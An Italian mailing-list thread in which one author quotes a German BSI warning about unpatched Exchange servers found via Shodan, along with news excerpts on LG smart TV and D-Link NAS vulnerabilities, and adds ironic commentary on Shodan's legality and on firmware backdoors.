[CDT:Lmenouno] German BSI warns: Critical vulnerabilities in (not updated) Exchange servers. (aka Internet of Broken Things)
Buongiorno, la questione è stata portata alla mia attenzione da un recente intervento di Antonio [1] in lista, che ringrazio. Executive summary: il 5 Marzo BSI ha emanato un comunicato stampa (e una relazione PDF in DE) perché ha trovato via Shodan [2] che decine di migliaia (17K secondo i ben informati) di server MS Excange non sono ancora stati aggiornati con aggiornamenti di sicurezza critici. Sarà mica una novità? Sapete quante notizie o ricerche si possono confezionare grazie a Shodan in merito a quanti dispositivi server, router e "IoT" connessi a internet sono vulnerabili a qualche "attacco NON zero-day" (di cui è disponibile la "patch")? Beh se non lo sapevate, *sapetelo*: https://duckduckgo.com/?q=shodan+discovered+vulnerable+devices&ia=web «Critical vulnerabilities in Exchange servers» https://www.bsi.bund.de/EN/Themen/Unternehmen-und-Organisationen/Information... --8<---------------cut here---------------start------------->8--- According to the IT service provider Shodan, tens of thousands of Exchange servers in Germany were vulnerable to attack via the Internet and are very likely already infected with malware. This situation affects companies and organisations of all sizes. The BSI recommends installing the security updates provided by Microsoft without delay. Vulnerable Exchange systems should be checked for relevant anomalies as a matter of urgency due to the high risk of attack. You will find a BSI cyber security warning containing information and measures for dealing with these vulnerabilitie: [Microsoft Exchange Schwachstellen Detektion und Reaktion]. The relevant information is continually updated on the BSI website. [Microsoft Exchange Schwachstellen Detektion und Reaktion] </SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf?__blob=publicationFile&v=6> Additional information: ─────────────────────── [Press releases from the BSI - 5. März 2021] [Recording of the BSI-Livestream "Informationen und Hilfestellungen" - 11. März 2021 on YouTube] [Further information and links, including external support services] [Press releases from the BSI - 5. März 2021] <file:DE/Service-Navi/Presse/Pressemitteilungen/Presse2021/210305_Exchange-Schwachstelle.html?nn=1010128> [Recording of the BSI-Livestream "Informationen und Hilfestellungen" - 11. März 2021 on YouTube] <https://youtu.be/QcqRRc-VoB0> [Further information and links, including external support services] <file:DE/IT-Sicherheitsvorfall/Unternehmen/unternehmen_node.html> --8<---------------cut here---------------end--------------->8--- Loving, 380° [1] https://server-nexa.polito.it/pipermail/nexa/2024-April/052462.html [2] https://www.shodan.io/ «Shodan is the world's first search engine for Internet-connected devices. Discover how Internet intelligence can help you make better decisions.» see also: https://en.wikipedia.org/wiki/Shodan_(website) -- 380° (Giovanni Biscuolo public alter ego) «Noi, incompetenti come siamo, non abbiamo alcun titolo per suggerire alcunché» Disinformation flourishes because many people care deeply about injustice but very few check the facts. Ask me about <https://stallmansupport.org>.
380° <g380@biscuolo.net> writes: [...]
Sapete quante notizie o ricerche si possono confezionare grazie a Shodan in merito a quanti dispositivi server, router e "IoT" connessi a internet sono vulnerabili a qualche "attacco NON zero-day" (di cui è disponibile la "patch")?
E la cosa che mi fa scompisciare dalle risate è che: --8<---------------cut here---------------start------------->8--- Using Shodan with respect to a device the user does not own is a felony crime under the laws of some states in the United States even if no damage is done to the device or system. --8<---------------cut here---------------end--------------->8--- via: https://en.wikipedia.org/wiki/Shodan_(website) Sono sicuro che sia illegale, illegale da codice penale, anche in altri stati non ancora documentati su Wikipedia. :-D In galera! B-)
Beh se non lo sapevate, *sapetelo*: https://duckduckgo.com/?q=shodan+discovered+vulnerable+devices&ia=web
Tipo, per citare gli ultimi: 1. «Over 90,000 LG Smart TVs may be exposed to remote attacks» (9 Aprile 2024) https://www.bleepingcomputer.com/news/security/over-90-000-lg-smart-tvs-may-... --8<---------------cut here---------------start------------->8--- CVE-2023-6318 is an elevation of privilege vulnerability that allows attackers to gain root access following the initial unauthorized access provided by CVE-2023-6317. [...] Bitdefender reported its findings to LG on November 1, 2023, but it took the vendor until March 22, 2024, to release the related security updates. [...] Though TVs are less critical in terms of security, the severity of remote command execution remains potentially significant [...] --8<---------------cut here---------------end--------------->8--- Ricordo che è molto probabile che tutte le TV "smart" abbiano un microfono, alcune hanno pure una telecamera integrata. 2. «Critical takeover vulnerabilities in 92,000 D-Link devices under active exploitation» (8 Aprile 2024) https://arstechnica.com/security/2024/04/hackers-actively-exploit-critical-r... --8<---------------cut here---------------start------------->8--- Hackers are actively exploiting a pair of recently discovered vulnerabilities to remotely commandeer network-attached storage devices manufactured by D-Link, researchers said Monday. Roughly 92,000 devices are vulnerable to the remote takeover exploits [...] The first, tracked as CVE-2024-3272 and carrying a severity rating of 9.8 out of 10, is a backdoor account enabled by credentials hardcoded into the firmware. The second is a command-injection flaw tracked as CVE-2024-3273 and has a severity rating of 7.3. It can be remotely activated with a simple HTTP GET request. --8<---------------cut here---------------end--------------->8--- Lasciate che ve lo ripeta: "backdoor account enabled by credentials hardcoded into the firmware". Chiaro?!? Capite perché la *presunta* distinzione tra software e firmware mi infastidisce, ci sono "esperti del settore" che ancora la /predicano/. ...insomma, business as _usual_, no? Loving, 380° -- 380° (Giovanni Biscuolo public alter ego) «Noi, incompetenti come siamo, non abbiamo alcun titolo per suggerire alcunché» Disinformation flourishes because many people care deeply about injustice but very few check the facts. Ask me about <https://stallmansupport.org>.
participants (1)
-
380°